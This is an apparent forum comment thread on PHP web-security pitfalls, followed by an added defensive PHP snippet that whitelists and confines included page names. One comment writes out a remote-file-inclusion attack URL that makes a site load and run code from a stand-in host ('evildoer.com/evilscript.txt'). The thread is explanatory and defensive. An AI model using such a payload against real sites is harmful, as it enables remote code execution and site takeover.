Community Page
- technosailor.com
4 years ago
Are you gonna do anything on FTP security? Not being much of a security buff myself, but thinking about it, were someone able to gain FTP access (don't know but with register_globals on, could you pass a system command through a $_GET equiv, or guest accounts/public_ftp etc.) then they could upload whatever they wanted and have away with your system.
And you might want to mention for the more n00b programmers out there to give all includes a .php extension (and not a .inc, for example ;) :p).
Matt
4 years ago
Checking $_SERVER['DOCUMENT_ROOT'] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)
3 years ago
I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:
And then they run it with something like "http://www.example.com/index.php?page=page5.html".
All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.
Moral: allow_url_fopen should *always* be off unless you need it.
Rob
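
A defensive counterpart to the `?page=` include pattern described in the comment above, as an added example that is not part of the original thread: the requested name is matched against a strict file-name pattern, confined to one directory with `realpath()`, and served with `readfile()` rather than `include`. `PAGES_DIR`, `resolve_page()`, `render_page()` and the `.html` naming are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread. PAGES_DIR, resolve_page() and
// render_page() are hypothetical names; pages are assumed to be static .html files.
const PAGES_DIR = __DIR__ . '/pages';

// Map a user-supplied page name to a real file inside $baseDir, or return null.
function resolve_page(string $requested, string $baseDir = PAGES_DIR): ?string
{
    // Accept only a bare file name: no scheme (http://, ftp://, php://),
    // no directory separators, no "..", no NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.html\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested);
    // realpath() is false for missing files and resolves symlinks, so the prefix
    // check also rejects a link that points outside the pages directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($base === false || $path === false
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    // Static content is read and sent, never include()d, so PHP tags inside
    // a page file are emitted as text instead of being executed.
    readfile($path);
}

// Constructed demo for the CLI: builds a throwaway pages directory and tests inputs.
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/page5.html', '<p>page 5</p>');
    $inputs = ['page5.html', 'http://evildoer.com/evilscript.txt', '../index.php'];
    foreach ($inputs as $p) {
        printf("%-36s %s\n", $p, resolve_page($p, $dir) === null ? 'rejected' : 'served');
    }
    unlink($dir . '/page5.html');
    rmdir($dir);
}
```

Since PHP 5.2, remote `include` is governed by the separate `allow_url_include` directive, which is off by default and should stay off alongside input validation like the above.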